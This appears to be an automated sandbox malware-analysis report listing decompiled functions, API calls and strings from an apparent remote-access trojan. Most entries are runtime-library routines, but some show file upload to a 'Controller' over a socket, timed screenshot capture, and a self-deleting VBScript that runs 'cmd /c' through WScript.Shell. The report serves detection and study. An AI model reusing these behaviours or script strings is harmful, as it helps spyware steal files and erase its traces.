InitializeCriticalSectionAndSpinCount.KERNEL32(00CE4738,00000FA0,?,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC243D
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC2448
GetModuleHandleW.KERNEL32(kernel32.dll,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC2459
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CC246B
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CC2479
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC249C
___scrt_fastfail.LIBCMT ref: 00CC24AD
DeleteCriticalSection.KERNEL32(00CE4738,00000007,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC24B8
CloseHandle.KERNEL32(00000000,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC24C8

Strings

SleepConditionVariableCS, xrefs: 00CC2465
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CC2443
WakeAllConditionVariable, xrefs: 00CC2471
kernel32.dll, xrefs: 00CC2454

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: e487b38f40500e2771242b12eb87cec7874294caed9f7d35c34c5e4f90b3b6d2
Instruction ID: 3ae962a23ef8da906a439594d5df81c74f5a7ac162bba0cf1d5cb3418f1c84f3
Opcode Fuzzy Hash: e487b38f40500e2771242b12eb87cec7874294caed9f7d35c34c5e4f90b3b6d2
Instruction Fuzzy Hash: D701DF71A42711ABC728AF75FD0EF2E37E9EB85B50B05002AF911D6250EB74C940CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00445C96 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445D06
_free.LIBCMT ref: 00445D1C
_free.LIBCMT ref: 00445D2D
_free.LIBCMT ref: 00445D3E
_free.LIBCMT ref: 00445D55
GetCPInfo.KERNEL32(?,?), ref: 00445D9D

Part of subcall function 00452DB5: _free.LIBCMT ref: 00452E20

_free.LIBCMT ref: 00445F49
_free.LIBCMT ref: 00445F5C
_free.LIBCMT ref: 00445F6A
_free.LIBCMT ref: 00445F75
_free.LIBCMT ref: 00445FB7
_free.LIBCMT ref: 00445FBF
_free.LIBCMT ref: 00445FC7
_free.LIBCMT ref: 00445FCF
_free.LIBCMT ref: 00445FDD

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 5389e19cd8074467722e87e13c63451ee21fb00145f5e1c4a4ed7b29eb800e90
Instruction ID: 35b30c28121b6b0c9a6e456b1157ba059d574d411cc2403bfcf1dfeedd9c98fb
Opcode Fuzzy Hash: 5389e19cd8074467722e87e13c63451ee21fb00145f5e1c4a4ed7b29eb800e90
Instruction Fuzzy Hash: ECB1CE71900605AFEF10DF69C881BEEBBB5BF08304F24402EF994A7342DB799945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

Uploading file to Controller: , xrefs: 00408DD5
SetFilePointerEx error, xrefs: 00408FD4
NG, xrefs: 00408C17
ReadFile error, xrefs: 00408FC8

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
API String ID: 3086580692-2582957567
Opcode ID: 427d2a644fcf572750d78cadef3739e3e7f58da9a0c79bc12abacaf3f5ed2758
Instruction ID: 9a9de3c1f97d4aeb1c15f1b9dcb3f5412df516a05423aabf9feb9beab6c98786
Opcode Fuzzy Hash: 427d2a644fcf572750d78cadef3739e3e7f58da9a0c79bc12abacaf3f5ed2758
Instruction Fuzzy Hash: 88B192316083409BC314FB26C992AAFB7E5AFC4354F40492FF589622D1EF789945CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A674 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0040A68E

Part of subcall function 0040A5C3: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A69B), ref: 0040A5F9
Part of subcall function 0040A5C3: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A69B), ref: 0040A608
Part of subcall function 0040A5C3: Sleep.KERNEL32(00002710,?,?,?,0040A69B), ref: 0040A635
Part of subcall function 0040A5C3: CloseHandle.KERNEL32(00000000,?,?,?,0040A69B), ref: 0040A63C

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A6CA
GetFileAttributesW.KERNEL32(00000000), ref: 0040A6DB
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A6F2
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A76C

Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A875

Strings

PG, xrefs: 0040A855
8SG, xrefs: 0040A745
pQG, xrefs: 0040A6BF
8SG, xrefs: 0040A750
PG, xrefs: 0040A6FA
pQG, xrefs: 0040A6AF

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$pQG$pQG$PG$PG
API String ID: 3795512280-1152054767
Opcode ID: 6fe2898c7a098da1e411ac960d19b54830d1cd1166583224f82eb58c1664eb67
Instruction ID: cf95c0dacd67fb8131f25f5cd09860d96f75af0bde8ca3c14b7674e5c1903afd
Opcode Fuzzy Hash: 6fe2898c7a098da1e411ac960d19b54830d1cd1166583224f82eb58c1664eb67
Instruction Fuzzy Hash: 4C517E716043055ACB05BB32C866ABE77AA5F80349F40483FB682B71E2DF7C9909865E

Uniqueness

Uniqueness Score: -1.00%

Function 00451207 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045124B

Part of subcall function 00450443: _free.LIBCMT ref: 00450460
Part of subcall function 00450443: _free.LIBCMT ref: 00450472
Part of subcall function 00450443: _free.LIBCMT ref: 00450484
Part of subcall function 00450443: _free.LIBCMT ref: 00450496
Part of subcall function 00450443: _free.LIBCMT ref: 004504A8
Part of subcall function 00450443: _free.LIBCMT ref: 004504BA
Part of subcall function 00450443: _free.LIBCMT ref: 004504CC
Part of subcall function 00450443: _free.LIBCMT ref: 004504DE
Part of subcall function 00450443: _free.LIBCMT ref: 004504F0
Part of subcall function 00450443: _free.LIBCMT ref: 00450502
Part of subcall function 00450443: _free.LIBCMT ref: 00450514
Part of subcall function 00450443: _free.LIBCMT ref: 00450526
Part of subcall function 00450443: _free.LIBCMT ref: 00450538

_free.LIBCMT ref: 00451240

Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00451262
_free.LIBCMT ref: 00451277
_free.LIBCMT ref: 00451282
_free.LIBCMT ref: 004512A4
_free.LIBCMT ref: 004512B7
_free.LIBCMT ref: 004512C5
_free.LIBCMT ref: 004512D0
_free.LIBCMT ref: 00451308
_free.LIBCMT ref: 0045130F
_free.LIBCMT ref: 0045132C
_free.LIBCMT ref: 00451344

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2f1d87d0e257826117984e37254ff410fc3e82beb909631ef58ecd84ed80cd16
Instruction ID: c063d82046dfb7db7ea77a1ca71dc0387125a27f9d9c771daae3e06cc2a2942d
Opcode Fuzzy Hash: 2f1d87d0e257826117984e37254ff410fc3e82beb909631ef58ecd84ed80cd16
Instruction Fuzzy Hash: DC315E31504301AEEB20AA7AD856B5773E8AF01315F26856FFC48D7262DF38AC44CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD5F4 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00CCD638

Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD1EE
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD200
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD212
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD224
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD236
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD248
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD25A
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD26C
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD27E
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD290
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2A2
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2B4
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2C6

_free.LIBCMT ref: 00CCD62D

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979

_free.LIBCMT ref: 00CCD64F
_free.LIBCMT ref: 00CCD664
_free.LIBCMT ref: 00CCD66F
_free.LIBCMT ref: 00CCD691
_free.LIBCMT ref: 00CCD6A4
_free.LIBCMT ref: 00CCD6B2
_free.LIBCMT ref: 00CCD6BD
_free.LIBCMT ref: 00CCD6F5
_free.LIBCMT ref: 00CCD6FC
_free.LIBCMT ref: 00CCD719
_free.LIBCMT ref: 00CCD731

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e2069f1e58a866e4cd5eeac30d1c3846d4e2bf7da74960a08ee496cea153efa8
Instruction ID: ef8e33214b20f5c50c407ec465469dcd56e5f12e4de300c2e5897a8a8fa355f1
Opcode Fuzzy Hash: e2069f1e58a866e4cd5eeac30d1c3846d4e2bf7da74960a08ee496cea153efa8
Instruction Fuzzy Hash: 8B316C716047059FEB21AA79D885F6B73E8AF40350F10492DF06AD7191DF30EE85DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00419F02 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00419F07
GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419F39
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00419FC5
Sleep.KERNEL32(000003E8), ref: 0041A04B
GetLocalTime.KERNEL32(?), ref: 0041A053
Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A142

Strings

PG, xrefs: 0041A017
PG, xrefs: 00419F64
time_%04i%02i%02i_%02i%02i%02i, xrefs: 00419FED
PG, xrefs: 0041A0FB
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00419FE8, 0041A009, 0041A077

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
API String ID: 489098229-1431523004
Opcode ID: a8da52c30f34f733819d3fb30956e5b9677740672e8e7ea6aee02b6146ebfe0e
Instruction ID: 53b10142388d6e618379421ea863975f0427ee42951a241e26dd10475b989a70
Opcode Fuzzy Hash: a8da52c30f34f733819d3fb30956e5b9677740672e8e7ea6aee02b6146ebfe0e
Instruction Fuzzy Hash: 75517D70A00215AACB14BBB5C8569FD7B69AF44308F40403FF509AB1E2EF7C9D85C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040D74D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1

Part of subcall function 00413646: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413662
Part of subcall function 00413646: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041367B
Part of subcall function 00413646: RegCloseKey.KERNEL32(00000000), ref: 00413686

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D7A7
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D906
ExitProcess.KERNEL32 ref: 0040D912

Strings

8SG, xrefs: 0040D75D
.vbs, xrefs: 0040D7AD
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D8B5
exepath, xrefs: 0040D77F
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D847
""", 0, xrefs: 0040D82F
Temp, xrefs: 0040D7E8
open, xrefs: 0040D900

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 6f600e62e7459217c9cc1041d556212d7b75326f8bcfb9aedaa3be0501c90c64
Instruction ID: c4a317b5347046847bfe7fc55b5e2b024c4a0365841bea6b80e5cdcb83cecef3
Opcode Fuzzy Hash: 6f600e62e7459217c9cc1041d556212d7b75326f8bcfb9aedaa3be0501c90c64
Instruction Fuzzy Hash: 374129719001196ACB15FA62DC56DEEB778AF50709F10007FB106B31E2FF785E8ACA98

Uniqueness

Uniqueness Score: -1.00%

Function 00450541 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450589
_free.LIBCMT ref: 004505AD
_free.LIBCMT ref: 004505BA
_free.LIBCMT ref: 004505DF
_free.LIBCMT ref: 004505EC
_free.LIBCMT ref: 004505F5
_free.LIBCMT ref: 004508D3
_free.LIBCMT ref: 004508DB

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 150d02efb69288e28b538d13911ced70cd88637e204aac801fa1dbe9debde128
Instruction ID: 19307f6e3054a2b86938e0910b3516461ca86888dd331947a388e70c702e76ea
Opcode Fuzzy Hash: 150d02efb69288e28b538d13911ced70cd88637e204aac801fa1dbe9debde128
Instruction Fuzzy Hash: 6CC17675D00208AFDB20DBA8CC82FDE77F89B09745F154156FE04FB287D67499458B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
closesocket.WS2_32(000000FF), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: ea79b75f1ae65c935e1138fe974f2fff21a9703030cabbfa4cd42eb945bff9c9
Instruction ID: 36cd0b6e7e722fc311c13f4f3d89471b6fda53dcd65266afdd9727349a39dcbc
Opcode Fuzzy Hash: ea79b75f1ae65c935e1138fe974f2fff21a9703030cabbfa4cd42eb945bff9c9
Instruction Fuzzy Hash: F821EA71104B04AFDB316B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB75B851DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00CCE6C0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CCE379: CreateFileW.KERNEL32(00000000,00000000,?,00CCE769,?,?,00000000,?,00CCE769,00000000,0000000C), ref: 00CCE396

GetLastError.KERNEL32 ref: 00CCE7D4
__dosmaperr.LIBCMT ref: 00CCE7DB
GetFileType.KERNEL32(00000000), ref: 00CCE7E7
GetLastError.KERNEL32 ref: 00CCE7F1
__dosmaperr.LIBCMT ref: 00CCE7FA
CloseHandle.KERNEL32(00000000), ref: 00CCE81A
CloseHandle.KERNEL32(00CC87EE), ref: 00CCE967
GetLastError.KERNEL32 ref: 00CCE999
__dosmaperr.LIBCMT ref: 00CCE9A0

Strings

H, xrefs: 00CCE925

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: a3a743773de4d99e8da291dd90709406559296910eee75821370d29fc13f919e
Instruction ID: 40853db1ac23a7b6485b861393f4532e65754350f899ad157d71ea9d4965f16c
Opcode Fuzzy Hash: a3a743773de4d99e8da291dd90709406559296910eee75821370d29fc13f919e
Instruction Fuzzy Hash: 38A10432A041589FCF19AF68DC92FAE3BA1AB07320F18015DF811AF3E2D7359952DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00455B1C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004557EA: CreateFileW.KERNEL32(00000000,00000000,?,00455BC5,?,?,00000000,?,00455BC5,00000000,0000000C), ref: 00455807

GetLastError.KERNEL32 ref: 00455C30
__dosmaperr.LIBCMT ref: 00455C37
GetFileType.KERNEL32(00000000), ref: 00455C43
GetLastError.KERNEL32 ref: 00455C4D
__dosmaperr.LIBCMT ref: 00455C56
CloseHandle.KERNEL32(00000000), ref: 00455C76
CloseHandle.KERNEL32(?), ref: 00455DC0
GetLastError.KERNEL32 ref: 00455DF2
__dosmaperr.LIBCMT ref: 00455DF9

Strings

H, xrefs: 00455D7E

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 399b877e36de6a5c117d04748259f3f5ee8ff48d0ba2fa8d85c55bfe295cd247
Instruction ID: 56c3c6f7ff717df319bbbb51fb2fc9f7fa86c8cd8c14b94b2a1c43a0bf66d1dd
Opcode Fuzzy Hash: 399b877e36de6a5c117d04748259f3f5ee8ff48d0ba2fa8d85c55bfe295cd247
Instruction Fuzzy Hash: B4A14632A106049FDF19AF68DC617BE7BA0EB06325F14015EEC11EB392D7399C16CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00450966 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D5
_free.LIBCMT ref: 004509E3
_free.LIBCMT ref: 00450B11
_free.LIBCMT ref: 00450B1C

Strings

\&G, xrefs: 00450B5D
`&G, xrefs: 00450B75
\&G, xrefs: 00450B65

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: 51886c83d460ca1f1e6488eae7f609bd221569302eddb2c6de307cc91536e8c9
Instruction ID: 997e24f70132231b6ca759a19b47624983911e3be9dffde99cd9162d123c0bc6
Opcode Fuzzy Hash: 51886c83d460ca1f1e6488eae7f609bd221569302eddb2c6de307cc91536e8c9
Instruction Fuzzy Hash: 7C610375900205AFDB20CFA9C842BAABBF4EF09315F24416BED44EB342D774AD45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00414AFE Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 00414BAE, 00414BB6, 00414BBA
65535, xrefs: 00414B01

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 5dd592201d8a346242394efb96da626efb11898a272192137d190e0d426a4b06
Instruction ID: 82029065c0b78db9351da75f496251e2fcb37d529d8e3b0a8074ff1270b1487a
Opcode Fuzzy Hash: 5dd592201d8a346242394efb96da626efb11898a272192137d190e0d426a4b06
Instruction Fuzzy Hash: 2D51CD7120A301ABD3209A68C909BBB77A4AFC4750F05052FF88697391F66DDCC196AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043A77A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A7D2
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A7DF
__dosmaperr.LIBCMT ref: 0043A7E6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A812
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A81C
__dosmaperr.LIBCMT ref: 0043A823
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A866
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A870
__dosmaperr.LIBCMT ref: 0043A877
_free.LIBCMT ref: 0043A883
_free.LIBCMT ref: 0043A88A

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 323ed2088c2585d4f5ed1c6d124068b85cad53423d8da8c927901c3b3984bd57
Instruction ID: 7a249d13fa055752909bc64b4bd8998278545b645867af894ce57546f5e9ab17
Opcode Fuzzy Hash: 323ed2088c2585d4f5ed1c6d124068b85cad53423d8da8c927901c3b3984bd57
Instruction Fuzzy Hash: 3C31B071804209BBDF15AFA5CC45CAF3B7CEF09364F10012AF950562A1DB39CD61DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32 ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
